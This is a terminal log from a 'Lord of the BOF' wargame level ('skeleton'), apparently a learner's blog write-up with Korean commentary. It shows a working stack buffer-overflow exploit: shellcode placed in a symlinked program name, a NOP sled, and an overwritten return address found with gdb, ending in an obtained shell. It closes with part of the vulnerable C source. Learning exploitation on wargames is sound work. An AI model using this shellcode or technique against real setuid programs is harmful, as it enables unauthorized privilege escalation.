[vampire@localhost vampire]$ ./`perl -e 'print "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` `perl -e 'print "\xbf"x44, "\xcd/xff/xff/xbf"'`

stack is still your friend.

[vampire@localhost vampire]$ ./`perl -e 'print "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` `perl -e 'print "\xbf"x44, "\xcd\xff\xff\xbf"'`

옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜?

Segmentation fault (core dumped)

[vampire@localhost vampire]$ gdb -q ./`perl -e 'print "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` core

warning: core file may not match specified executable file.

Core was generated by ` '.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0 0xbfffffcd in ?? ()

(gdb) b main

Breakpoint 1 at 0x8048506

(gdb) r

Starting program: /home/vampire/./h?須?h

켚Thjo??i0chi0tijY

?y?投T?

Breakpoint 1, 0x8048506 in main ()

(gdb) x/10wx 4esp

Invalid number "4esp".

(gdb) x/10wx $esp

0xbffffa88: 0x080482d0 0x40021ca0 0xbffffab8 0x4000a970

0xbffffa98: 0x400f855b 0x08049734 0x4000ae60 0xbffffb04

0xbffffaa8: 0xbffffab8 0x080484eb

(gdb) x/40wx $esp

0xbffffa88: 0x080482d0 0x40021ca0 0xbffffab8 0x4000a970

0xbffffa98: 0x400f855b 0x08049734 0x4000ae60 0xbffffb04

0xbffffaa8: 0xbffffab8 0x080484eb 0x08049720 0x08049734

0xbffffab8: 0xbffffad8 0x400309cb 0x00000001 0xbffffb04

0xbffffac8: 0xbffffb0c 0x40013868 0x00000001 0x08048450

0xbffffad8: 0x00000000 0x08048471 0x08048500 0x00000001

0xbffffae8: 0xbffffb04 0x08048390 0x080486ac 0x4000ae60

0xbffffaf8: 0xbffffafc 0x40013e90 0x00000001 0xbffffbf9

0xbffffb08: 0x00000000 0xbffffc31 0xbffffc53 0xbffffc5d

0xbffffb18: 0xbffffc6b 0xbffffc8a 0xbffffc9a 0xbffffcb4

(gdb)

0xbffffb28: 0xbffffcd1 0xbffffcf0 0xbffffcfb 0xbffffd09

0xbffffb38: 0xbffffd4c 0xbffffd5f 0xbffffd74 0xbffffd84

0xbffffb48: 0xbffffd91 0xbffffdb0 0xbffffdcb 0xbffffdd6

0xbffffb58: 0xbffffde7 0xbffffdf9 0xbffffe01 0x00000000

0xbffffb68: 0x00000003 0x08048034 0x00000004 0x00000020

0xbffffb78: 0x00000005 0x00000006 0x00000006 0x00001000

0xbffffb88: 0x00000007 0x40000000 0x00000008 0x00000000

0xbffffb98: 0x00000009 0x08048450 0x0000000b 0x000001fd

0xbffffba8: 0x0000000c 0x000001fd 0x0000000d 0x000001fd

0xbffffbb8: 0x0000000e 0x000001fd 0x00000010 0x0fabfbff

(gdb)

0xbffffbc8: 0x0000000f 0xbffffbf4 0x00000000 0x00000000

0xbffffbd8: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffbe8: 0x00000000 0x00000000 0x00000000 0x36383669

0xbffffbf8: 0x6f682f00 0x762f656d 0x69706d61 0x2e2f6572

0xbffffc08: 0xe28a682f 0xb16881ce 0x6854530c 0xe48a6f6a

0xbffffc18: 0x30690168 0x30696863 0x146a6974 0x0c0cfe59

0xbffffc28: 0x41fa7949 0xc354e1f7 0x53454c00 0x45504f53

0xbffffc38: 0x2f7c3d4e 0x2f727375 0x2f6e6962 0x7373656c

0xbffffc48: 0x65706970 0x2068732e 0x55007325 0x4e524553

0xbffffc58: 0x3d454d41 0x53494800 0x5a495354 0x30313d45

(gdb)

0xbffffc68: 0x48003030 0x4e54534f 0x3d454d41 0x61636f6c

0xbffffc78: 0x736f686c 0x6f6c2e74 0x646c6163 0x69616d6f

0xbffffc88: 0x4f4c006e 0x4d414e47 0x61763d45 0x7269706d

0xbffffc98: 0x45520065 0x45544f4d 0x54534f48 0x3239313d

0xbffffca8: 0x3836312e 0x2e30312e 0x00313431 0x4c49414d

0xbffffcb8: 0x61762f3d 0x70732f72 0x2f6c6f6f 0x6c69616d

0xbffffcc8: 0x6d61762f 0x65726970 0x43414d00 0x50595448

0xbffffcd8: 0x33693d45 0x722d3638 0x61686465 0x696c2d74

0xbffffce8: 0x2d78756e 0x00756e67 0x4d524554 0x6574783d

0xbffffcf8: 0x48006d72 0x5454534f 0x3d455059 0x36383369

(gdb)

0xbffffd08: 0x54415000 0x752f3d48 0x6c2f7273 0x6c61636f

0xbffffd18: 0x6e69622f 0x69622f3a 0x752f3a6e 0x622f7273

0xbffffd28: 0x2f3a6e69 0x2f727375 0x52313158 0x69622f36

0xbffffd38: 0x682f3a6e 0x2f656d6f 0x706d6176 0x2f657269

0xbffffd48: 0x006e6962 0x454d4f48 0x6f682f3d 0x762f656d

0xbffffd58: 0x69706d61 0x49006572 0x5455504e 0x2f3d4352

0xbffffd68: 0x2f637465 0x75706e69 0x00637274 0x4c454853

0xbffffd78: 0x622f3d4c 0x622f6e69 0x00687361 0x52455355

0xbffffd88: 0x6d61763d 0x65726970 0x53414200 0x4e455f48

0xbffffd98: 0x682f3d56 0x2f656d6f 0x706d6176 0x2f657269

(gdb)

0xbffffda8: 0x7361622e 0x00637268 0x50534944 0x3d59414c

0xbffffdb8: 0x2e323931 0x2e383631 0x312e3031 0x303a3134

0xbffffdc8: 0x4c00302e 0x3d474e41 0x555f6e65 0x534f0053

0xbffffdd8: 0x45505954 0x6e696c3d 0x672d7875 0x5000756e

0xbffffde8: 0x2f3d4457 0x656d6f68 0x6d61762f 0x65726970

0xbffffdf8: 0x4c485300 0x323d4c56 0x5f534c00 0x4f4c4f43

0xbffffe08: 0x6e3d5352 0x30303d6f 0x3d69663a 0x643a3030

0xbffffe18: 0x31303d69 0x3a34333b 0x303d6e6c 0x36333b31

0xbffffe28: 0x3d69703a 0x333b3034 0x6f733a33 0x3b31303d

0xbffffe38: 0x623a3533 0x30343d64 0x3b33333b 0x633a3130

(gdb)

0xbffffe48: 0x30343d64 0x3b33333b 0x6f3a3130 0x31303d72

0xbffffe58: 0x3b35303b 0x343b3733 0x696d3a31 0x3b31303d

0xbffffe68: 0x333b3530 0x31343b37 0x3d78653a 0x333b3130

0xbffffe78: 0x2e2a3a32 0x3d646d63 0x333b3130 0x2e2a3a32

0xbffffe88: 0x3d657865 0x333b3130 0x2e2a3a32 0x3d6d6f63

0xbffffe98: 0x333b3130 0x2e2a3a32 0x3d6d7462 0x333b3130

0xbffffea8: 0x2e2a3a32 0x3d746162 0x333b3130 0x2e2a3a32

0xbffffeb8: 0x303d6873 0x32333b31 0x632e2a3a 0x303d6873

0xbffffec8: 0x32333b31 0x742e2a3a 0x303d7261 0x31333b31

0xbffffed8: 0x742e2a3a 0x303d7a67 0x31333b31 0x612e2a3a

(gdb)

0xbffffee8: 0x303d6a72 0x31333b31 0x742e2a3a 0x303d7a61

0xbffffef8: 0x31333b31 0x6c2e2a3a 0x303d687a 0x31333b31

0xbfffff08: 0x7a2e2a3a 0x303d7069 0x31333b31 0x7a2e2a3a

0xbfffff18: 0x3b31303d 0x2a3a3133 0x303d5a2e 0x31333b31

0xbfffff28: 0x672e2a3a 0x31303d7a 0x3a31333b 0x7a622e2a

0xbfffff38: 0x31303d32 0x3a31333b 0x7a622e2a 0x3b31303d

0xbfffff48: 0x2a3a3133 0x3d7a742e 0x333b3130 0x2e2a3a31

0xbfffff58: 0x3d6d7072 0x333b3130 0x2e2a3a31 0x6f697063

0xbfffff68: 0x3b31303d 0x2a3a3133 0x67706a2e 0x3b31303d

0xbfffff78: 0x2a3a3533 0x6669672e 0x3b31303d 0x2a3a3533

(gdb)

0xbfffff88: 0x706d622e 0x3b31303d 0x2a3a3533 0x6d62782e

0xbfffff98: 0x3b31303d 0x2a3a3533 0x6d70782e 0x3b31303d

0xbfffffa8: 0x2a3a3533 0x676e702e 0x3b31303d 0x2a3a3533

0xbfffffb8: 0x6669742e 0x3b31303d 0x003a3533 0x6d6f682f

0xbfffffc8: 0x61762f65 0x7269706d 0x2f2e2f65 0xcee28a68

0xbfffffd8: 0x0cb16881 0x6a685453 0x68e48a6f 0x63306901

0xbfffffe8: 0x74306968 0x59146a69 0x490c0cfe 0xf741fa79

0xbffffff8: 0x00c354e1 0x00000000 Cannot access memory at address 0xc0000000

(gdb) x/40x $esp

0xbffffa88: 0x080482d0 0x40021ca0 0xbffffab8 0x4000a970

0xbffffa98: 0x400f855b 0x08049734 0x4000ae60 0xbffffb04

0xbffffaa8: 0xbffffab8 0x080484eb 0x08049720 0x08049734

0xbffffab8: 0xbffffad8 0x400309cb 0x00000001 0xbffffb04

0xbffffac8: 0xbffffb0c 0x40013868 0x00000001 0x08048450

0xbffffad8: 0x00000000 0x08048471 0x08048500 0x00000001

0xbffffae8: 0xbffffb04 0x08048390 0x080486ac 0x4000ae60

0xbffffaf8: 0xbffffafc 0x40013e90 0x00000001 0xbffffbf9

0xbffffb08: 0x00000000 0xbffffc31 0xbffffc53 0xbffffc5d

0xbffffb18: 0xbffffc6b 0xbffffc8a 0xbffffc9a 0xbffffcb4

(gdb)

0xbffffb28: 0xbffffcd1 0xbffffcf0 0xbffffcfb 0xbffffd09

0xbffffb38: 0xbffffd4c 0xbffffd5f 0xbffffd74 0xbffffd84

0xbffffb48: 0xbffffd91 0xbffffdb0 0xbffffdcb 0xbffffdd6

0xbffffb58: 0xbffffde7 0xbffffdf9 0xbffffe01 0x00000000

0xbffffb68: 0x00000003 0x08048034 0x00000004 0x00000020

0xbffffb78: 0x00000005 0x00000006 0x00000006 0x00001000

0xbffffb88: 0x00000007 0x40000000 0x00000008 0x00000000

0xbffffb98: 0x00000009 0x08048450 0x0000000b 0x000001fd

0xbffffba8: 0x0000000c 0x000001fd 0x0000000d 0x000001fd

0xbffffbb8: 0x0000000e 0x000001fd 0x00000010 0x0fabfbff

(gdb)

0xbffffbc8: 0x0000000f 0xbffffbf4 0x00000000 0x00000000

0xbffffbd8: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffbe8: 0x00000000 0x00000000 0x00000000 0x36383669

0xbffffbf8: 0x6f682f00 0x762f656d 0x69706d61 0x2e2f6572

0xbffffc08: 0xe28a682f 0xb16881ce 0x6854530c 0xe48a6f6a

0xbffffc18: 0x30690168 0x30696863 0x146a6974 0x0c0cfe59

0xbffffc28: 0x41fa7949 0xc354e1f7 0x53454c00 0x45504f53

0xbffffc38: 0x2f7c3d4e 0x2f727375 0x2f6e6962 0x7373656c

0xbffffc48: 0x65706970 0x2068732e 0x55007325 0x4e524553

0xbffffc58: 0x3d454d41 0x53494800 0x5a495354 0x30313d45

(gdb)

0xbffffc68: 0x48003030 0x4e54534f 0x3d454d41 0x61636f6c

0xbffffc78: 0x736f686c 0x6f6c2e74 0x646c6163 0x69616d6f

0xbffffc88: 0x4f4c006e 0x4d414e47 0x61763d45 0x7269706d

0xbffffc98: 0x45520065 0x45544f4d 0x54534f48 0x3239313d

0xbffffca8: 0x3836312e 0x2e30312e 0x00313431 0x4c49414d

0xbffffcb8: 0x61762f3d 0x70732f72 0x2f6c6f6f 0x6c69616d

0xbffffcc8: 0x6d61762f 0x65726970 0x43414d00 0x50595448

0xbffffcd8: 0x33693d45 0x722d3638 0x61686465 0x696c2d74

0xbffffce8: 0x2d78756e 0x00756e67 0x4d524554 0x6574783d

0xbffffcf8: 0x48006d72 0x5454534f 0x3d455059 0x36383369

(gdb)

0xbffffd08: 0x54415000 0x752f3d48 0x6c2f7273 0x6c61636f

0xbffffd18: 0x6e69622f 0x69622f3a 0x752f3a6e 0x622f7273

0xbffffd28: 0x2f3a6e69 0x2f727375 0x52313158 0x69622f36

0xbffffd38: 0x682f3a6e 0x2f656d6f 0x706d6176 0x2f657269

0xbffffd48: 0x006e6962 0x454d4f48 0x6f682f3d 0x762f656d

0xbffffd58: 0x69706d61 0x49006572 0x5455504e 0x2f3d4352

0xbffffd68: 0x2f637465 0x75706e69 0x00637274 0x4c454853

0xbffffd78: 0x622f3d4c 0x622f6e69 0x00687361 0x52455355

0xbffffd88: 0x6d61763d 0x65726970 0x53414200 0x4e455f48

0xbffffd98: 0x682f3d56 0x2f656d6f 0x706d6176 0x2f657269

(gdb)

0xbffffda8: 0x7361622e 0x00637268 0x50534944 0x3d59414c

0xbffffdb8: 0x2e323931 0x2e383631 0x312e3031 0x303a3134

0xbffffdc8: 0x4c00302e 0x3d474e41 0x555f6e65 0x534f0053

0xbffffdd8: 0x45505954 0x6e696c3d 0x672d7875 0x5000756e

0xbffffde8: 0x2f3d4457 0x656d6f68 0x6d61762f 0x65726970

0xbffffdf8: 0x4c485300 0x323d4c56 0x5f534c00 0x4f4c4f43

0xbffffe08: 0x6e3d5352 0x30303d6f 0x3d69663a 0x643a3030

0xbffffe18: 0x31303d69 0x3a34333b 0x303d6e6c 0x36333b31

0xbffffe28: 0x3d69703a 0x333b3034 0x6f733a33 0x3b31303d

0xbffffe38: 0x623a3533 0x30343d64 0x3b33333b 0x633a3130

(gdb)

0xbffffe48: 0x30343d64 0x3b33333b 0x6f3a3130 0x31303d72

0xbffffe58: 0x3b35303b 0x343b3733 0x696d3a31 0x3b31303d

0xbffffe68: 0x333b3530 0x31343b37 0x3d78653a 0x333b3130

0xbffffe78: 0x2e2a3a32 0x3d646d63 0x333b3130 0x2e2a3a32

0xbffffe88: 0x3d657865 0x333b3130 0x2e2a3a32 0x3d6d6f63

0xbffffe98: 0x333b3130 0x2e2a3a32 0x3d6d7462 0x333b3130

0xbffffea8: 0x2e2a3a32 0x3d746162 0x333b3130 0x2e2a3a32

0xbffffeb8: 0x303d6873 0x32333b31 0x632e2a3a 0x303d6873

0xbffffec8: 0x32333b31 0x742e2a3a 0x303d7261 0x31333b31

0xbffffed8: 0x742e2a3a 0x303d7a67 0x31333b31 0x612e2a3a

(gdb)

0xbffffee8: 0x303d6a72 0x31333b31 0x742e2a3a 0x303d7a61

0xbffffef8: 0x31333b31 0x6c2e2a3a 0x303d687a 0x31333b31

0xbfffff08: 0x7a2e2a3a 0x303d7069 0x31333b31 0x7a2e2a3a

0xbfffff18: 0x3b31303d 0x2a3a3133 0x303d5a2e 0x31333b31

0xbfffff28: 0x672e2a3a 0x31303d7a 0x3a31333b 0x7a622e2a

0xbfffff38: 0x31303d32 0x3a31333b 0x7a622e2a 0x3b31303d

0xbfffff48: 0x2a3a3133 0x3d7a742e 0x333b3130 0x2e2a3a31

0xbfffff58: 0x3d6d7072 0x333b3130 0x2e2a3a31 0x6f697063

0xbfffff68: 0x3b31303d 0x2a3a3133 0x67706a2e 0x3b31303d

0xbfffff78: 0x2a3a3533 0x6669672e 0x3b31303d 0x2a3a3533

(gdb)

0xbfffff88: 0x706d622e 0x3b31303d 0x2a3a3533 0x6d62782e

0xbfffff98: 0x3b31303d 0x2a3a3533 0x6d70782e 0x3b31303d

0xbfffffa8: 0x2a3a3533 0x676e702e 0x3b31303d 0x2a3a3533

0xbfffffb8: 0x6669742e 0x3b31303d 0x003a3533 0x6d6f682f

0xbfffffc8: 0x61762f65 0x7269706d 0x2f2e2f65 0xcee28a68

0xbfffffd8: 0x0cb16881 0x6a685453 0x68e48a6f 0x63306901

0xbfffffe8: 0x74306968 0x59146a69 0x490c0cfe 0xf741fa79

0xbffffff8: 0x00c354e1 0x00000000 Cannot access memory at address 0xc0000000

(gdb)

0xc0000004: Cannot access memory at address 0xc0000004

(gdb) x/10s $esp

0xbffffa88: "?202\004\b?\034\002@뫄퓈?

0xbffffa97: "@[\205\017@4\227\004\b`?

0xbffffaa3: "@\004?옇?용\204\004\b \227\004\b4\227\004\b綿옹\t\003@\001"

0xbffffac2: ""

0xbffffac3: ""

0xbffffac4: "\004??f?퓀8\001@\001"

0xbffffad2: ""

0xbffffad3: ""

0xbffffad4: "P\204\004\b"

0xbffffad9: ""

(gdb)

0xbffffada: ""

0xbffffadb: ""

0xbffffadc: "q\204\004\b"

0xbffffae1: "\205\004\b\001"

0xbffffae6: ""

0xbffffae7: ""

0xbffffae8: "\004??220\203\004\b?206\004\b`?

0xbffffaf7: "@斅?220>\001@\001"

0xbffffb02: ""

0xbffffb03: ""

(gdb)

0xbffffb04: "港?

0xbffffb09: ""

0xbffffb0a: ""

0xbffffb0b: ""

0xbffffb0c: "1?풱???퓃??212??232?였?왐?욹?웝??t?풪???퓍??204??221?염?옹?왜?욜?월??001??

0xbffffb65: ""

0xbffffb66: ""

0xbffffb67: ""

0xbffffb68: "\003"

0xbffffb6a: ""

(gdb)

0xbffffb6b: ""

0xbffffb6c: "4\200\004\b\004"

0xbffffb72: ""

0xbffffb73: ""

0xbffffb74: " "

0xbffffb76: ""

0xbffffb77: ""

0xbffffb78: "\005"

0xbffffb7a: ""

0xbffffb7b: ""

(gdb)

0xbffffb7c: "\006"

0xbffffb7e: ""

0xbffffb7f: ""

0xbffffb80: "\006"

0xbffffb82: ""

0xbffffb83: ""

0xbffffb84: ""

0xbffffb85: "\020"

0xbffffb87: ""

0xbffffb88: "\a"

(gdb)

0xbffffb8a: ""

0xbffffb8b: ""

0xbffffb8c: ""

0xbffffb8d: ""

0xbffffb8e: ""

0xbffffb8f: "@\b"

0xbffffb92: ""

0xbffffb93: ""

0xbffffb94: ""

0xbffffb95: ""

(gdb)

0xbffffb96: ""

0xbffffb97: ""

0xbffffb98: "\t"

0xbffffb9a: ""

0xbffffb9b: ""

0xbffffb9c: "P\204\004\b\013"

0xbffffba2: ""

0xbffffba3: ""

0xbffffba4: "?001"

0xbffffba7: ""

(gdb)

0xbffffba8: "\f"

0xbffffbaa: ""

0xbffffbab: ""

0xbffffbac: "?001"

0xbffffbaf: ""

0xbffffbb0: "\r"

0xbffffbb2: ""

0xbffffbb3: ""

0xbffffbb4: "?001"

0xbffffbb7: ""

(gdb)

0xbffffbb8: "\016"

0xbffffbba: ""

0xbffffbbb: ""

0xbffffbbc: "?001"

0xbffffbbf: ""

0xbffffbc0: "\020"

0xbffffbc2: ""

0xbffffbc3: ""

0xbffffbc4: "螢\017\017"

0xbffffbca: ""

(gdb)

0xbffffbcb: ""

0xbffffbcc: "憔?

0xbffffbd1: ""

0xbffffbd2: ""

0xbffffbd3: ""

0xbffffbd4: ""

0xbffffbd5: ""

0xbffffbd6: ""

0xbffffbd7: ""

0xbffffbd8: ""

(gdb)

0xbffffbd9: ""

0xbffffbda: ""

0xbffffbdb: ""

0xbffffbdc: ""

0xbffffbdd: ""

0xbffffbde: ""

0xbffffbdf: ""

0xbffffbe0: ""

0xbffffbe1: ""

0xbffffbe2: ""

(gdb)

0xbffffbe3: ""

0xbffffbe4: ""

0xbffffbe5: ""

0xbffffbe6: ""

0xbffffbe7: ""

0xbffffbe8: ""

0xbffffbe9: ""

0xbffffbea: ""

0xbffffbeb: ""

0xbffffbec: ""

(gdb)

0xbffffbed: ""

0xbffffbee: ""

0xbffffbef: ""

0xbffffbf0: ""

0xbffffbf1: ""

0xbffffbf2: ""

0xbffffbf3: ""

0xbffffbf4: "i686"

0xbffffbf9: "/home/vampire/./h\212須\201h?fSThjo\212?\001i0chi0tij\024Y?f\fIy?投T?

0xbffffc31: "LESSOPEN=|/usr/bin/lesspipe.sh %s"

(gdb)

0xbffffc53: "USERNAME="

0xbffffc5d: "HISTSIZE=1000"

0xbffffc6b: "HOSTNAME=localhost.localdomain"

0xbffffc8a: "LOGNAME=vampire"

0xbffffc9a: "REMOTEHOST=192.168.10.141"

0xbffffcb4: "MAIL=/var/spool/mail/vampire"

0xbffffcd1: "MACHTYPE=i386-redhat-linux-gnu"

0xbffffcf0: "TERM=xterm"

0xbffffcfb: "HOSTTYPE=i386"

0xbffffd09: "PATH=/usr/local/bin:/bin:/usr/bin:/usr/X11R6/bin:/home/vampire/bin"

(gdb)

0xbffffd4c: "HOME=/home/vampire"

0xbffffd5f: "INPUTRC=/etc/inputrc"

0xbffffd74: "SHELL=/bin/bash"

0xbffffd84: "USER=vampire"

0xbffffd91: "BASH_ENV=/home/vampire/.bashrc"

0xbffffdb0: "DISPLAY=192.168.10.141:0.0"

0xbffffdcb: "LANG=en_US"

0xbffffdd6: "OSTYPE=linux-gnu"

0xbffffde7: "PWD=/home/vampire"

0xbffffdf9: "SHLVL=2"

(gdb)

0xbffffe01: "LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:or=01;05;37;41:mi=01;05;37;41:ex=01;32:*.cmd=01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.sh=01;32:*.csh=01"...

0xbffffec9: ";32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.bz=01;31:*.tz=01;31:*.rpm=01;31:*.cpio=01;31:*.jpg=01;35:*.gif=01;35:*.bmp=01;3"...

0xbfffff91: "5:*.xbm=01;35:*.xpm=01;35:*.png=01;35:*.tif=01;35:"

0xbfffffc4: "/home/vampire/./h\212須\201h?fSThjo\212?\001i0chi0tij\024Y?f\fIy?投T?

0xbffffffc: ""

0xbffffffd: ""

0xbffffffe: ""

0xbfffffff: ""

0xc0000000: <Address 0xc0000000 out of bounds>

(gdb) x/x 0xbfffffc4

0xbfffffc4: 0x6d6f682f

(gdb) x/10x 0xbfffffc4

0xbfffffc4: 0x6d6f682f 0x61762f65 0x7269706d 0x2f2e2f65

0xbfffffd4: 0xcee28a68 0x0cb16881 0x6a685453 0x68e48a6f

0xbfffffe4: 0x63306901 0x74306968

(gdb) x/10x 0xbfffffc3

0xbfffffc3: 0x6f682f00 0x762f656d 0x69706d61 0x2e2f6572

0xbfffffd3: 0xe28a682f 0xb16881ce 0x6854530c 0xe48a6f6a

0xbfffffe3: 0x30690168 0x30696863

(gdb) x/10x 0xbfffffc1

0xbfffffc1: 0x2f003a35 0x656d6f68 0x6d61762f 0x65726970

0xbfffffd1: 0x682f2e2f 0x81cee28a 0x530cb168 0x6f6a6854

0xbfffffe1: 0x0168e48a 0x68633069

(gdb) q

The program is running. Exit anyway? (y or n) y

[vampire@localhost vampire]$ clear

[vampire@localhost vampire]$ rm rf *

rm: cannot remove `rf': No such file or directory

rm: j

X?Rh: is a directory

rm: remove write-protected file `skeleton'? y^Hn

rm: remove write-protected file `skeleton.c'? n

[vampire@localhost vampire]$ ls

j?X?Rh skeleton.c

[vampire@localhost vampire]$ oh shit

bash2: oh: command not found

[vampire@localhost vampire]$ gcc skeleton.c -o skeleton

[vampire@localhost vampire]$ ln -s ./ssssssss `perl -e 'print "\x90"x40, "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'`

[vampire@localhost vampire]$ ./`perl -e 'print "\x90"x40, "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` `perl -e 'print "\xbf"x48'`

bash2: ./????????????????????????????????????????h?須?h

SThjo??i0chi0tijY

Iy?投T? No such file or directory

[vampire@localhost vampire]$ cp skeleton ssssssss

[vampire@localhost vampire]$ ./`perl -e 'print "\x90"x40, "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` `perl -e 'print "\xbf"x48'`

옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜

Segmentation fault (core dumped)

[vampire@localhost vampire]$ gdb `perl -e 'print "\x90"x40, "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` core

GNU gdb 19991004

GDB is free software, covered by the GNU General Public License, and you are

welcome to change it and/or distribute copies of it under certain conditions.

Type "show copying" to see the conditions.

There is absolutely no warranty for GDB. Type "show warranty" for details.

This GDB was configured as "i386-redhat-linux"...

warning: core file may not match specified executable file.

Core was generated by ` '.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0 0xbfbfbfbf in ?? ()

(gdb) b main

Breakpoint 1 at 0x8048506

(gdb) r

Starting program: /home/vampire/????????????????????????????????????????h?須?h

켚Thjo??i0chi0tijY

?y?投T?

Breakpoint 1, 0x8048506 in main ()

(gdb) x/10x 0xbfffffcd

0xbfffffcd: 0x90909090 0x68909090 0x81cee28a 0x530cb168

0xbfffffdd: 0x6f6a6854 0x0168e48a 0x68633069 0x69743069

0xbfffffed: 0xfe59146a 0x79490c0c

(gdb) x/10x 0xbfffffd2

0xbfffffd2: 0x8a689090 0x6881cee2 0x54530cb1 0x8a6f6a68

0xbfffffe2: 0x690168e4 0x69686330 0x6a697430 0x0cfe5914

0xbffffff2: 0xfa79490c 0x54e1f741

(gdb) x/10x 0xbfffffd4

0xbfffffd4: 0xcee28a68 0x0cb16881 0x6a685453 0x68e48a6f

0xbfffffe4: 0x63306901 0x74306968 0x59146a69 0x490c0cfe

0xbffffff4: 0xf741fa79 0x00c354e1

(gdb) q

The program is running. Exit anyway? (y or n) y

[vampire@localhost vampire]$ ./`perl -e 'print "\x90"x40, "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` `perl -e 'print "\xbf"x44, "\xd4\xff\xff\xbf"'`

옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜?

bash$ hell yes

sh: hell: command not found

bash$ exit

exit

[vampire@localhost vampire]$ rm ./ssssssss `perl -e 'print "\x90"x40, "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'`

[vampire@localhost vampire]$ ln -s ./skeleton `perl -e 'print "\x90"x40, "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'`

[vampire@localhost vampire]$ ./`perl -e 'print "\x90"x40, "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` `perl -e 'print "\xbf"x48'`

옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜

Segmentation fault (core dumped)

[vampire@localhost vampire]$ ./`perl -e 'print "\x90"x40, "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` `perl -e 'print "\xbf"x44, "\xd4\xff\xff\xbf"'`

옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜?

bash$ my-pass

쉘코드는 지난번에 사용한 2f없는것도 왠일로 안먹길래,, 그리고 ~~2f들어가는거 심볼릭 링크로 하는거 배웠는데 손이랑 머리가 고자라 기억못해서~~ 삽질끝에 풀이에서 가져왔어요. 쉘코드 출처:http://john-data.tistory.com/187

풀이는 안봤어요 히힣ㅎ히히히히히히 보려고도 했으나 엄청나게 설명이 많아서 그냥 다 때려치고 학교프로젝트도 때려치고 이것만 때려잡으려는찰나에 히히힣ㅎ히히히히히

잡담은 그만하고 정리한 로그 보여드릴께요.

//bash 2, ./ssssssss는 복사본.

[vampire@localhost vampire]$ ls

skeleton skeleton.c

[vampire@localhost vampire]$ cat skeleton.c

/*

The Lord of the BOF : The Fellowship of the BOF

- skeleton

- argv hunter

*/

#include <stdio.h>

#include <stdlib.h>

extern char **environ;

main(int argc, char *argv[])

{

char buffer[40];

int i, saved_argc;

if(argc < 2){

printf("argv error\n");

exit(0);

}

// egghunter

for(i=0; environ[i]; i++)

memset(environ[i], 0, strlen(environ[i]));

if(argv[1][47] != '\xbf')

{

printf("stack is still your friend.\n");

exit(0);

}

// check the length of argument

